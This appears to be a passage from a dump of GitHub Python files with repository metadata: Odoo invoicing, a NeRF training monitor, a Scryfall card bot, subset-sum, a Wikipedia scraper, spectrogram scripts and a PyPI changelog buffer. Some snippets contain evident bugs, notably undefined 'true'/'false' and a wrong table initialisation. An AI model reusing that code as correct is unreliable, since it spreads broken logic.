'__main__':\n\tprint(example0())","repo_name":"jvalansi/word2code","sub_path":"word2code/res/translations/TaroGrid.py","file_name":"TaroGrid.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21739852206","text":"from openerp.addons.at_base import util\nfrom openerp.addons.at_base import format\nfrom openerp.tools.translate import _\nfrom openerp.osv import osv\nimport time\n\n\nclass account_analytic_line(osv.Model):\n\n    def _prepare_cost_invoice(self, cr, uid, partner, company_id, currency_id, analytic_lines, context=None):\n        res = super(account_analytic_line, self)._prepare_cost_invoice(cr, uid, partner, company_id, currency_id, analytic_lines, context=context)\n\n        line_ids = [l.id for l in analytic_lines]\n        account = analytic_lines[0].account_id\n        f = format.LangFormat(cr, uid, context)\n\n        cr.execute(\"SELECT MIN(line.date), MAX(line.date) \" \\\n                   \"FROM account_analytic_line as line \" \\\n                   \"WHERE account_id = %s \" \\\n                   \"AND id IN %s AND to_invoice IS NOT NULL\", (account.id, tuple(line_ids)))\n\n        invoice_name = None\n        for date_from, date_to in cr.fetchall():\n            if date_from and date_to:\n                invoice_name = \"%s %s - %s\" % (account.name or \"\", f.formatLang(date_from, date=True), f.formatLang(date_to, date=True))\n\n        if not invoice_name:\n            invoice_name = \"%s %s\" % (account.name or \"\", f.formatLang(util.currentDate(), date=True))\n\n        res[\"name\"] = invoice_name\n        return res\n\n    def _prepare_cost_invoice_line(self, cr, uid, invoice_id, product_id, uom, user_id,\n                                   factor_id, account, analytic_lines, 
journal_type, data, context=None):\n product_obj = self.pool['product.product']\n \n f = format.LangFormat(cr, uid, context)\n uom_context = dict(context or {}, uom=uom)\n \n total_price = sum(l.amount for l in analytic_lines)\n total_qty = sum(l.unit_amount for l in analytic_lines)\n\n if data.get('product'):\n # force product, use its public price\n if isinstance(data['product'], (tuple, list)):\n product_id = data['product'][0]\n else:\n product_id = data['product']\n unit_price = self._get_invoice_price(cr, uid, account, product_id, user_id, total_qty, uom_context)\n elif journal_type == 'general' and product_id:\n # timesheets, use sale price\n unit_price = self._get_invoice_price(cr, uid, account, product_id, user_id, total_qty, uom_context)\n else:\n # expenses, using price from amount field\n unit_price = total_price*-1.0 / total_qty\n\n factor = self.pool['hr_timesheet_invoice.factor'].browse(cr, uid, factor_id, context=uom_context)\n factor_name = factor.customer_name or ''\n curr_invoice_line = {\n 'price_unit': unit_price,\n 'quantity': total_qty,\n 'product_id': product_id,\n 'discount': factor.factor,\n 'invoice_id': invoice_id,\n 'name': factor_name,\n 'uos_id': uom,\n 'account_analytic_id': account.id,\n }\n\n if product_id:\n product = product_obj.browse(cr, uid, product_id, context=uom_context)\n factor_name = product_obj.name_get(cr, uid, [product_id], context=uom_context)[0][1]\n if factor.customer_name:\n factor_name += ' - ' + factor.customer_name\n\n general_account = product.property_account_income or product.categ_id.property_account_income_categ\n if not general_account:\n raise osv.except_osv(_('Error!'), _(\"Configuration Error!\") + '\\n' + _(\"Please define income account for product '%s'.\") % product.name)\n taxes = product.taxes_id or general_account.tax_ids\n tax = self.pool['account.fiscal.position'].map_tax(cr, uid, account.partner_id.property_account_position, taxes)\n curr_invoice_line.update({\n 'invoice_line_tax_id': [(6, 0, tax)],\n 'name': factor_name,\n 'invoice_line_tax_id': [(6, 0, tax)],\n 'account_id': general_account.id,\n })\n\n note = []\n for line in analytic_lines:\n # set invoice_line_note\n details = []\n if data.get('date', False):\n details.append(f.formatLang(line['date'],date=True))\n if data.get('time', False):\n line_time = f.formatLang(line.unit_amount,float_time=True)\n if line['product_uom_id']:\n details.append(\"%s %s\" % (line_time, line.product_uom_id.name))\n else:\n details.append(\"%s\" % (line_time, ))\n if data.get('name', False):\n details.append(line['name'])\n if details:\n note.append(u' - '.join(map(lambda x: unicode(x) or '', details)))\n if note:\n curr_invoice_line['name'] += \"\\n\" + (\"\\n\".join(map(lambda x: unicode(x) or '', note)))\n return curr_invoice_line\n \n \n _inherit = \"account.analytic.line\"\n","repo_name":"funkring/fdoo","sub_path":"addons-funkring/at_hr/hr_timesheet_invoice.py","file_name":"hr_timesheet_invoice.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73102749924","text":"from pathlib import Path\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nTEST_PATH = Path(\"/home/jperl/Developer/tutorials/pyimagesearch-nerf-tutorial\")\n\ndef get_train_monitor(test_ds, encoder_fn, l_xyz, l_dir, image_path):\n # get images and rays from testing dataset\n (t_elements, t_images) = next(iter(test_ds))\n (t_ray_origins_coarse, t_ray_dirs_coarse, t_vals_coarse) = t_elements\n\n # 
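The pricing branch in `_prepare_cost_invoice_line()` is easy to miss: timesheet lines (journal type `general` with a product) are billed at the product's sale price, while expense lines back the unit price out of the negative analytic amounts. A reduced model with invented numbers:

```python
# Reduced model of the unit-price branching above; values are made up.
def unit_price(journal_type, product_id, total_price, total_qty, sale_price):
    if journal_type == "general" and product_id:
        return sale_price                   # timesheets: product sale price
    return total_price * -1.0 / total_qty   # expenses: analytic costs are negative

print(unit_price("general", 42, -800.0, 8.0, 120.0))    # -> 120.0
print(unit_price("purchase", None, -800.0, 8.0, 120.0)) # -> 100.0
```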
build the test coarse rays\n    t_rays_coarse = t_ray_origins_coarse[..., None, :] + (t_ray_dirs_coarse[..., None, :] * t_vals_coarse[..., None])\n\n    # positionally encode the rays and direction vectors for the coarse rays\n    t_rays_coarse = encoder_fn(t_rays_coarse, l_xyz)\n    t_dirs_coarse_shape = tf.shape(t_rays_coarse[..., :3])\n    t_ray_dirs_coarse = tf.broadcast_to(t_ray_dirs_coarse[..., None, :], shape=t_dirs_coarse_shape)\n    t_dirs_coarse = encoder_fn(t_ray_dirs_coarse, l_dir)\n\n    class TrainMonitor(tf.keras.callbacks.Callback):\n        def on_epoch_end(self, epoch, logs=None):\n            # compute the coarse model prediction\n            (t_rgb_coarse, t_sigma_coarse) = self.model.coarse_model.predict([t_rays_coarse, t_dirs_coarse])\n\n            # render the image from the model prediction\n            t_render_coarse = self.model.render_img_depth(rgb=t_rgb_coarse, sigma=t_sigma_coarse, t_vals=t_vals_coarse)\n            (t_img_coarse, _, t_weights_coarse) = t_render_coarse\n\n            # compute the middle values of t_vals\n            t_vals_coarse_mid = 0.5 * (t_vals_coarse[..., 1:] + t_vals_coarse[..., :-1])\n\n            # apply hierarchical sampling and get the t_vals for the fine model\n            t_vals_fine = self.model.sample_pdf(t_vals_mid=t_vals_coarse_mid, weights=t_weights_coarse, n_fine=self.model.n_fine_samples)\n            t_vals_fine = tf.sort(tf.concat([t_vals_coarse, t_vals_fine], axis=-1), axis=-1)\n\n            # build the fine rays and positionally encode them\n            t_rays_fine = t_ray_origins_coarse[..., None, :] + (t_ray_dirs_coarse[..., None, :] * t_vals_fine[..., None])\n            t_rays_fine = self.model.encode_fn(t_rays_fine, l_xyz)\n\n            # build the fine directions and positionally encode them\n            t_dirs_fine_shape = tf.shape(t_rays_fine[..., :3])\n            t_dirs_fine = tf.broadcast_to(t_ray_dirs_coarse[..., None, :], shape=t_dirs_fine_shape)\n            t_dirs_fine = self.model.encode_fn(t_dirs_fine, l_dir)\n\n            # compute the fine model prediction\n            t_rgb_fine, t_sigma_fine = self.model.fine_model.predict([t_rays_fine, t_dirs_fine])\n\n            # render the image from the model prediction\n            t_render_fine = self.model.render_img_depth(rgb=t_rgb_fine, sigma=t_sigma_fine, t_vals=t_vals_fine)\n            (t_img_fine, t_depth_fine, _) = t_render_fine\n\n            # plot the coarse image, fine image, fine depth map and target image\n            (fig, ax) = plt.subplots(nrows=1, ncols=4, figsize=(10, 10))\n\n            coarse_img = tf.keras.preprocessing.image.array_to_img(t_img_coarse[0])\n            tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-coarse.png\", coarse_img)\n\n            fine_img = tf.keras.preprocessing.image.array_to_img(t_img_fine[0])\n            tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-fine.png\", fine_img)\n\n            depth_img = tf.keras.preprocessing.image.array_to_img(t_depth_fine[0])\n            tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-depth-fine.png\", depth_img)\n\n            real_img = tf.keras.preprocessing.image.array_to_img(t_images[0])\n            tf.keras.preprocessing.image.save_img(image_path / f\"{epoch:03d}-real.png\", real_img)\n\n            plt.close()\n\n    # instantiate train monitor callback\n    return TrainMonitor()\n","repo_name":"JamesPerlman/pis-nerf-tut","sub_path":"src/training_monitor.py","file_name":"training_monitor.py","file_ext":"py","file_size_in_byte":3792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"27318387748","text":"import json\r\nimport requests\r\n\r\nurl = \"https://api.scryfall.com\"\r\ncards = url + \"/cards\"\r\n\r\ndata = requests.get(cards).json()\r\n\r\ni = 0\r\n\r\ndef Create_dict():\r\n    Card_dict = {}\r\n    data = requests.get(cards).json()  # fetch the first page of results\r\n
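The training monitor above assumes an `encoder_fn(x, l)` that positionally encodes coordinates through sines and cosines at `l` increasing frequencies, as in the standard NeRF formulation; whether the project's `encode_fn` matches this exactly is an assumption. A typical implementation:

```python
import tensorflow as tf

# A common NeRF-style positional encoding with the encoder_fn(x, l) signature
# used by the monitor above; the exact frequency scaling is an assumption.
def encoder_fn(x, l):
    parts = [x]
    for i in range(l):
        for fn in (tf.sin, tf.cos):
            parts.append(fn(2.0 ** i * x))
    return tf.concat(parts, axis=-1)

pts = tf.random.uniform((4, 32, 3))
print(encoder_fn(pts, 10).shape)  # (4, 32, 63) == 3 * (1 + 2 * 10)
```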
data[\"has_more\"]:\r\n\r\n for element in data[\"data\"]: #write keys in Card list\r\n name = element[\"name\"]\r\n Card_dict[\"name\"] = element\r\n\r\n if not data[\"has_more\"] == false: #Turn Page\r\n data = requests.get(cards[\"next_page\"])\r\n\r\n\r\n else:\r\n with open(\"DATA\", \"w\") as fo:\r\n json.dump(Card_dict, fo)\r\n break\r\n\r\n\r\ndef card_request():\r\n Card_dict = json.load(open(\"DATA\"))\r\n while true:\r\n cardname = input(\"Enter your cardname\")\r\n\r\n if \"cardname\" in Card_dict.keys(): #zugriff auf img\r\n print(Card_dict[\"cardname\"][\"image_uris\"][\"png\"])\r\n break\r\n else:\r\n print(\"did you mean Terminus ?\")\r\n print(Card_dict[\"Terminus\"][\"image_uris\"][\"png\"])\r\n\r\n\r\n\r\n","repo_name":"Dakuso/Telebot","sub_path":"Telegram_Bot/Teleboy.py","file_name":"Teleboy.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74791971044","text":"def subset_sum(arr,n,sum):\r\n T=[[-1 for i in range(sum+1)] for j in range(n+1)]\r\n for i in range(n+1):\r\n for j in range(sum+1):\r\n if i==0 or j!=0:\r\n T[i][j]=False\r\n elif j==0:\r\n T[i][j]=True\r\n for i in range(1,n+1):\r\n for j in range(1,sum+1):\r\n if i-1>=0:\r\n if arr[i-1]<=j:\r\n T[i][j]=T[i-1][j] or T[i-1][j-arr[i-1]]\r\n else:\r\n T[i][j]=T[i-1][j]\r\n return T\r\n\r\n\r\ndef minm_subset_sum_diff(arr,n):\r\n max=-99999\r\n sum=0\r\n for i in arr:\r\n sum+=i\r\n T=subset_sum(arr,n,sum)\r\n temp=T[n]\r\n for i in range((sum//2)+1):\r\n if temp[i]==True:\r\n if max str:\n \"\"\"Extracts text from a list of sections and its subsections recursively.\n\n Parameters\n ----------\n unnecessary_sections : list\n List of strings with skippable sections\n sections : list\n List of sections of a Wikipedia article\n level : int, optional\n Current level, by default 0\n\n Returns\n -------\n str\n Combined sections but without the unnecessary sections\n \"\"\"\n extracted_text = \"\"\n for section in sections:\n if section.title not in unnecessary_sections:\n extracted_text += section.text\n extracted_text += extracting_section(\n unnecessary_sections, section.sections, level + 1\n )\n return extracted_text\n\n\ndef generate_categories(\n wikipedia: wikipediaapi.Wikipedia,\n categories: dict,\n unnecessary_sections: list,\n max_articles: int = 200,\n min_article_length: int = 0,\n max_article_length: int = 10000,\n) -> dict:\n \"\"\"Iterates over a dictionary of Wikipedia categories and extracts articles per category until\n the max_articles parameter is reached. 
Each article has to contain at least min_article_length characters, and\n    articles longer than max_article_length characters are shortened.\n    The name of the category, the shortened article and the length of the article are saved in\n    a dictionary which is keyed by the article's title.\n\n    Parameters\n    ----------\n    wikipedia : wikipediaapi.Wikipedia\n        Wikipedia class from the `wikipediaapi` module\n    categories : dict\n        Wikipedia category names with lists of subcategories as values\n    unnecessary_sections : list\n        List of strings with skippable sections\n    max_articles : int, optional\n        The maximum number of articles per category, by default 200\n    min_article_length : int, optional\n        The minimum number of characters for an article, by default 0\n    max_article_length : int, optional\n        The maximum number of characters for an article, by default 10000\n\n    Returns\n    -------\n    dict\n        Article titles with a dictionary with the keys \"category\", \"text\" and \"length\" as value.\n    \"\"\"\n\n    articles = {}\n\n    for idx, (category_name, subcategories) in enumerate(categories.items()):\n        article_counter = 0\n\n        for subcategory in subcategories:\n            if article_counter >= max_articles:\n                break\n            category = wikipedia.page(subcategory)\n\n            for article in tqdm(\n                category.categorymembers.values(), desc=\"Iterating over articles\"\n            ):\n                if article_counter >= max_articles:\n                    break\n                # entries that are just lists of other articles are skipped\n                if article.ns == 0 and (\n                    \"Liste von\" not in article.title and \"Liste d\" not in article.title\n                ):\n                    article_dict = get_article(\n                        wikipedia,\n                        article,\n                        category_name,\n                        unnecessary_sections,\n                        min_article_length=min_article_length,\n                        max_article_length=max_article_length,\n                    )\n                    if article_dict:\n                        articles[article.title] = article_dict\n                        article_counter += 1\n\n        log_info = f\"{idx+1} of {len(categories)} categories loaded.\"\n        logging.info(f\"\\n\\n{len(log_info)*'-'}\\n{log_info}\\n{len(log_info)*'-'}\")\n    return articles\n\n\ndef get_article(\n    wikipedia: wikipediaapi.Wikipedia,\n    article: wikipediaapi.WikipediaPage,\n    category: str,\n    unnecessary_sections: list,\n    min_article_length: int = 0,\n    max_article_length: int = 10000,\n) -> dict:\n    \"\"\"Creates a dictionary with the title of the article as key and a dictionary with the keys\n    \"category\", \"text\" and \"length\" as value.\n\n    Example\n    -------\n    >>> get_article(wikipedia, 'Altersrente (id: ??, ns: 0)', 'Kategorie:Wirtschaft',\n        ['Literatur', 'Weblinks', 'Einzelnachweis', 'Einzelnachweise', 'Siehe auch'])\n    {\"Altersrente\":{category:\"Kategorie:Wirtschaft\", text:\"...\", len:1812}}\n\n    Parameters\n    ----------\n    wikipedia : wikipediaapi.Wikipedia\n        Wikipedia class from the `wikipediaapi` module\n    article : wikipediaapi.WikipediaPage\n        Page of the wikipedia article\n    category : str\n        Category of the article\n    unnecessary_sections : list\n        List of strings with skippable sections\n    min_article_length : int, optional\n        The minimum number of characters for an article, by default 0\n    max_article_length : int, optional\n        The maximum number of characters for an article, by default 10000\n\n    Returns\n    -------\n    dict\n        Article titles with a dictionary with the keys \"category\", \"text\" and \"length\" as value.\n    \"\"\"\n    article_dict = {}\n\n    # no anchored section articles in other articles\n    if article.exists():\n        reduced_article = article.summary + extracting_section(\n            unnecessary_sections, article.sections\n        )\n        # enforce the documented bounds: truncate overly long articles,\n        # then drop those below the minimum length\n        reduced_article = reduced_article[:max_article_length]\n        if len(reduced_article) < min_article_length:\n            reduced_article = \"\"\n\n        if 
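`generate_categories()` walks category members through the `wikipediaapi` package. Reduced to its core, the access pattern is the one below; the language and page title are arbitrary examples, and newer `wikipedia-api` releases also expect a `user_agent` argument:

```python
import wikipediaapi

# Minimal wikipedia-api access pattern used by the scraper above; the
# language and page title are arbitrary examples.
wiki = wikipediaapi.Wikipedia("de", extract_format=wikipediaapi.ExtractFormat.WIKI)
page = wiki.page("Altersrente")
if page.exists():
    print(page.title, len(page.summary))
    for section in page.sections:
        print("-", section.title)
```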
reduced_article:\n article_dict[\"category\"] = category\n article_dict[\"text\"] = reduced_article\n article_dict[\"length\"] = len(reduced_article)\n\n return article_dict\n\n\ndef parse_arguments():\n \"\"\"Initialize argument parser and return arguments.\"\"\"\n\n parser = argparse.ArgumentParser(\n prog=\"wikiscraper\",\n description=\"Tool to create a corpus of Wikipedia articles based on Wikipedia categories.\",\n )\n parser.add_argument(\n \"path\",\n type=str,\n help=\"Path to the JSON-File which contains the dictionary of the Wikipedia categories.\",\n )\n parser.add_argument(\n \"--lang\", \"-l\", type=str, default=\"de\", help=\"ISO2 lang string (default: 'de').\"\n )\n parser.add_argument(\n \"--max_articles\",\n \"-ma\",\n type=int,\n default=1000,\n help=\"Sets the maximum of articles per category (default: 1000).\",\n )\n parser.add_argument(\n \"--max_article_length\",\n \"-max\",\n type=int,\n default=10000,\n help=\"Maximum size of the article by characters (default: 10000).\",\n )\n parser.add_argument(\n \"--min_article_length\",\n \"-min\",\n type=int,\n default=0,\n help=\"Minimum size of the article by characters (default: 0).\",\n )\n parser.add_argument(\n \"--output_format\",\n \"-of\",\n type=str,\n choices=[\"csv\", \"json\"],\n default=\"json\",\n help=\"Format for the output (default: 'json').\",\n )\n\n return parser.parse_args()\n\n\ndef main(args):\n\n start_time = time.time()\n\n wikipediaapi.log.setLevel(level=wikipediaapi.logging.WARNING)\n out_hdlr = wikipediaapi.logging.StreamHandler(sys.stderr)\n out_hdlr.setFormatter(wikipediaapi.logging.Formatter(\"%(asctime)s %(message)s\"))\n out_hdlr.setLevel(wikipediaapi.logging.WARNING)\n wikipediaapi.log.addHandler(out_hdlr)\n\n # script logger\n logging.basicConfig(level=logging.INFO, filename=\"wikiscraper.log\", filemode=\"w\")\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n formatter = logging.Formatter(\"%(levelname)s: %(message)s\")\n console.setFormatter(formatter)\n logging.getLogger(\"\").addHandler(console)\n\n with Path(args.path).open(\"r\", encoding=\"utf-8\") as f:\n wikicategories = json.load(f)\n logging.info(f\"Successfully loaded the categories from the JSON-File.\")\n\n wikipedia = wikipediaapi.Wikipedia(\n args.lang, extract_format=wikipediaapi.ExtractFormat.WIKI\n )\n\n unnecessary_sections = [\n \"Literatur\",\n \"Weblinks\",\n \"Einzelnachweis\",\n \"Einzelnachweise\",\n \"Siehe auch\",\n ]\n\n categories = generate_categories(\n wikipedia,\n wikicategories,\n unnecessary_sections,\n max_articles=args.max_articles,\n min_article_length=args.min_article_length,\n max_article_length=args.max_article_length,\n )\n logging.info(\n \"Successfully generated lists of the articles (time: \"\n + f\"{int((time.time() - start_time) / 60)} minutes).\"\n )\n\n if args.output_format == \"json\":\n with open(\"articles.json\", \"w+\") as f:\n json.dump(categories, f, ensure_ascii=False)\n elif args.output_format == \"csv\":\n import pandas as pd\n\n df = pd.DataFrame([v for k, v in categories.items()])\n df = df.rename(columns={\"Unnamed: 0\": \"id\"})\n df.to_csv(\"articles.csv\", index=False)\n\n else:\n logging.info(\n f\"Output format '{args.output_format}' is unknown. 
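Put together with `parse_arguments()` and `main()` above, a run is equivalent to invoking the script from the shell; the categories file below is hypothetical, and a real run performs the full scrape:

```python
import sys

# Hypothetical invocation of the scraper from Python, equivalent to running
#   python wikiscraper.py categories.json --lang de --max_articles 500 --output_format csv
sys.argv = ["wikiscraper.py", "categories.json", "--lang", "de",
            "--max_articles", "500", "--output_format", "csv"]
args = parse_arguments()
main(args)
```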
Can't save results.\"\n        )\n\n    logging.info(f\"Successfully saved the articles.\")\n    logging.info(f\"Total runtime: {round((time.time() - start_time) / 60, 2)} minutes.\")\n\n\nif __name__ == \"__main__\":\n    args = parse_arguments()\n    main(args)\n","repo_name":"realjanpaulus/wikicategoryscraper","sub_path":"wikiscraper.py","file_name":"wikiscraper.py","file_ext":"py","file_size_in_byte":9301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17751201090","text":"import matplotlib.pyplot as plt\nimport aifc\nfrom os import walk\nimport numpy\nimport os\nimport librosa\nimport librosa.display\nimport scipy.signal as signal\n\n\ndef get_spec_mel(file):\n    save_name = '../Spectrograms/mel_spect/'\n    save_name = 'C:\\\\Users\\\\jorge\\\\Desktop\\\\MAI\\\\'\n    y, sr = librosa.load(file, duration=196)\n    ps = librosa.feature.melspectrogram(y=y, sr=sr, fmax=1024)\n    librosa.display.specshow(ps, y_axis='mel', x_axis='time')\n    plt.axis('off')\n    plt.savefig(save_name + file[20:-5] + '.png',\n                dpi=100,  # Dots per inch\n                bbox_inches='tight',\n                pad_inches=0)  # Spectrogram saved as a .png\n    plt.show()\n    plt.close()\n\n\ndef get_spec_scipy(file):\n    save_name = '../Spectrograms/scipy_spect/'\n    save_name = 'C:\\\\Users\\\\jorge\\\\Desktop\\\\MAI\\\\scipy'\n    with aifc.open(file, 'r') as f:\n        nframes = f.getnframes()\n        strsig = f.readframes(nframes)\n        data = numpy.frombuffer(strsig, numpy.short).byteswap()\n    f, t, sxx = signal.spectrogram(data)\n    plt.pcolormesh(t, f, sxx)\n    plt.axis('off')\n    plt.savefig(save_name + file[20:-5] + '.png',\n                dpi=100,  # Dots per inch\n                bbox_inches='tight',\n                pad_inches=0)  # Spectrogram saved as a .png\n    plt.show()\n    plt.close()\n\n\ndef split_list(alist, wanted_parts=1):\n    length = len(alist)\n    return [alist[i*length // wanted_parts: (i+1)*length // wanted_parts]\n            for i in range(wanted_parts)]\n\n\ndef get_files(folder_path):\n    audio_files = []\n    for (dirpath, dirnames, filenames) in walk(folder_path):\n        audio_files.extend(filenames)\n    return audio_files\n\n\nif __name__ == '__main__':\n    path = '../KaggleData/train/'\n    list_files = os.listdir(path)\n    split = split_list(list_files, 8)\n    print(len(split[0]))\n    import random\n    file = random.choice([path + fil for fil in list_files])\n    get_spec_mel(file)\n\n    get_spec_scipy(file)\n","repo_name":"JorgeRodri/WhaleClassificationDisk","sub_path":"mel_scipy_for_cluster.py","file_name":"mel_scipy_for_cluster.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26606371648","text":"def is_substring(A,B):\r\n    count = 0\r\n    for i in A:\r\n        if i in B:\r\n            count +=1\r\n    if count == len(A):\r\n        return True\r\n    else:\r\n        return False\r\n\r\nfile = open(\"A-small-attempt.in\",'r')\r\nl = int(file.readline())\r\ntemp = file.read().splitlines()\r\nfor i in range(l):\r\n    print(\"Case #\"+str(i+1)+\": \",end='')\r\n
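`get_spec_mel()` above plots the raw mel power spectrogram; a common variant log-compresses it with `librosa.power_to_db` first so quiet structure stays visible. A sketch of that variant (the audio path is hypothetical):

```python
import librosa
import librosa.display
import matplotlib.pyplot as plt

# Variant of get_spec_mel() above that converts power to dB before plotting;
# the input file name is made up.
y, sr = librosa.load("example.aiff", duration=196)
ps = librosa.feature.melspectrogram(y=y, sr=sr, fmax=1024)
ps_db = librosa.power_to_db(ps)  # log-compress for display
librosa.display.specshow(ps_db, sr=sr, y_axis="mel", x_axis="time", fmax=1024)
plt.axis("off")
plt.savefig("example.png", dpi=100, bbox_inches="tight", pad_inches=0)
plt.close()
```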
\r\n","repo_name":"Patrikejane/problemSolving","sub_path":"codejam/round 1B/Q1/Q1.py","file_name":"Q1.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34912943700","text":"\"Defines :class:`PyPI`, the low level interface to PyPI's event log.\"\n\nimport re\nimport socket\nimport logging\nimport http.client\nimport xmlrpc.client\nfrom bisect import bisect_left\nfrom operator import itemgetter\nfrom functools import lru_cache\nfrom collections import OrderedDict\nfrom datetime import datetime, timedelta, timezone\nfrom urllib.parse import urlsplit, urlunsplit\nfrom pathlib import PosixPath\n\nimport requests\nfrom urllib3.exceptions import TimeoutError\nfrom requests.exceptions import RequestException\nfrom simplejson.errors import JSONDecodeError\n\nfrom . import __version__\nfrom .format import canonicalize_name\n\n\nUTC = timezone.utc\n\n# see notes in PyPIBuffer\nPYPI_EPOCH = 628000\nPYPI_MARGIN = 2000\n\nlogging.getLogger('requests').setLevel(logging.WARNING)\nlogging.getLogger('urllib3').setLevel(logging.WARNING)\nlogger = logging.getLogger('pypi')\n\n\nclass PiWheelsTransport(xmlrpc.client.SafeTransport):\n \"\"\"\n Drop in Transport for xmlrpc.client that uses a custom User-Agent string\n (so PyPI can identify our requests more easily in case we're being\n naughty!) and which uses requests for good TLS support and timeouts.\n \"\"\"\n user_agent = 'piwheels/%s' % __version__\n\n def __init__(self, use_https=True, cert=None, verify=None, timeout=10,\n *args, **kwargs):\n self.cert = cert\n self.verify = verify\n self.use_https = use_https\n self.timeout = timeout\n super().__init__(*args, **kwargs)\n\n def request(self, host, handler, request_body, verbose):\n headers = {\n 'User-Agent': self.user_agent,\n 'Content-Type': 'text/xml',\n }\n url = self._build_url(host, handler)\n resp = requests.post(url, data=request_body, headers=headers,\n stream=True, cert=self.cert, verify=self.verify,\n timeout=self.timeout)\n try:\n resp.raise_for_status()\n except RequestException as exc:\n raise xmlrpc.client.ProtocolError(url, resp.status_code,\n str(exc), resp.headers)\n else:\n self.verbose = verbose\n return self.parse_response(resp.raw)\n\n def _build_url(self, host, handler):\n scheme = 'https' if self.use_https else 'http'\n return '%s://%s/%s' % (scheme, host, handler.lstrip('/'))\n\n\nclass PyPIBuffer:\n \"\"\"\n An iterator that provides an ordered buffer of PyPI events from the\n specified *serial* number.\n\n Early PyPI events are ... a bit of mess. Prior to serial #628000 (roughly),\n events have a habit of jumping backwards in time, and not just by a few\n seconds but by several days or even years in some cases. This leads to all\n sorts of fun including deletions before packages exist, and so on. Even\n after #628000, timestamps can go backwards but never by more than 3 minutes\n (that I've seen so far).\n\n To work around this this class does several things. Considering #628000 as\n the \"epoch\" of reliability:\n\n 1. If the starting *serial* is before the epoch, actually read from event 0\n and just start yielding once *serial* is reached as events before the\n epoch after effectively unordered.\n\n 2. Buffer all events as they are received, sorting the buffer by timestamp.\n\n 3. Yield nothing until the epoch is reached (actually 5 minutes after the\n epochal event).\n\n 4. 
Once the epoch is reached only yield events once the maximum timestamp\n in the buffer is > 5 minutes after the event being yielded.\n\n 5. For whatever starting serial is selected, actually start reading N\n serials earlier where N is currently 2000 which is a number larger than\n the maximum number of events PyPI has generated in a 5 minute period\n in the last few years (see note below).\n\n 5. To permit the system to remain reasonably responsive, end iteration\n after each network transaction.\n\n In 2013, there was an anomalous 5 minute period during which >16k events\n appear. However, this appears to be a result of \"tidying up\" around the\n reliability epoch. Thereafter, the number of events in a 5 minute period\n has never exceeded 1480 (and even that was relatively anomalous), hence the\n selection of 2000 as a safety margin.\n\n This algorithm does have the strange side-effect that, if iterating from\n the start of the PyPI history, the first several iterations will yield\n nothing (while the class is buffering up to the epoch), then suddenly ~600k\n rows will suddenly appear. Thereafter, ~50k rows will be yielded at a time.\n \"\"\"\n\n def __init__(self, *, serial=0, pypi_xmlrpc='https://pypi.org/pypi'):\n self._transport = PiWheelsTransport()\n self._client = xmlrpc.client.ServerProxy(pypi_xmlrpc, self._transport)\n self.serial = serial\n\n @property\n def serial(self):\n \"\"\"\n The next smallest serial to yield. Defaults to 0. Can be set after\n construction but doing so while actually start from a point some way\n before the requested serial to deal with re-ordering of events. In\n the case of pre-epoch events (see class documentation), the buffer will\n actually read from the start anyway.\n\n Note that the actual serial requested may not exist as PyPI can \"skip\"\n serials (presumably due to transaction rollbacks), so this property\n simply guarantees that the next returned serial will be greater than or\n equal to the one requested.\n \"\"\"\n return self._serial\n\n @serial.setter\n def serial(self, value):\n self._serial = value\n self._buffer = []\n self._next_serial = max(0, (\n 0 if value < PYPI_EPOCH else value) - PYPI_MARGIN)\n self._serial_timestamp = None\n\n def _get_events(self, serial):\n # On rare occasions we get some form of HTTP improper state, or DNS\n # lookups fail. In this case just return an empty list and try again\n # later. 
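The buffering rule the `PyPIBuffer` docstring describes, yield only events more than five minutes older than the newest buffered timestamp, comes down to `bisect_left` cuts over a timestamp-sorted list. A toy model with fabricated events:

```python
from bisect import bisect_left

# Toy model of the 5-minute window rule described above. Events are
# (timestamp, serial) pairs already sorted by timestamp; the data is made up.
buffer = [(t, s) for s, t in enumerate([0, 60, 120, 400, 500, 900])]
finish_timestamp = buffer[-1][0] - 5 * 60  # newest timestamp minus 5 minutes
times = [t for t, _ in buffer]
finish = bisect_left(times, finish_timestamp)
safe, pending = buffer[:finish], buffer[finish:]
print(safe)     # old enough to be considered settled: first five events
print(pending)  # still inside the reordering window; kept for the next pass
```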
If we get a protocol error with error 5xx it's a server-side\n # problem, so we again return an empty list and try later\n try:\n return [\n tuple(event) for event in\n self._client.changelog_since_serial(serial)\n ]\n except (OSError, http.client.ImproperConnectionState, TimeoutError) as exc:\n return []\n except xmlrpc.client.Fault as exc:\n if exc.faultCode == -32500:\n return [] # HTTPTooManyRequests; back off and try again\n else:\n raise\n except xmlrpc.client.ProtocolError as exc:\n if exc.errcode >= 500:\n return []\n else:\n raise\n\n def __iter__(self):\n events = self._get_events(self._next_serial)\n if not events:\n return\n # Tuple layout is (package, version, timestamp, action, serial) and\n # output of _get_events is assumed to be sorted by serial\n last_serial = self._next_serial\n self._next_serial = events[-1][4]\n if self._serial_timestamp is None and self._serial <= self._next_serial:\n # Find the timestamp of the event we want in the serial-sorted\n # events, so we can easily find it in the timestamp-sorted\n # buffer\n self._serial_timestamp = events[\n bisect_left([event[4] for event in events], self._serial)][2]\n self._buffer.extend(events)\n if self._next_serial <= PYPI_EPOCH:\n # Don't yield anything until we're past the epoch\n return\n if self._serial_timestamp is None:\n # We haven't yet located the serial we're seeking in the buffered\n # events\n return\n self._buffer.sort(key=itemgetter(2, 4))\n finish_timestamp = self._buffer[-1][2] - (5 * 60)\n if 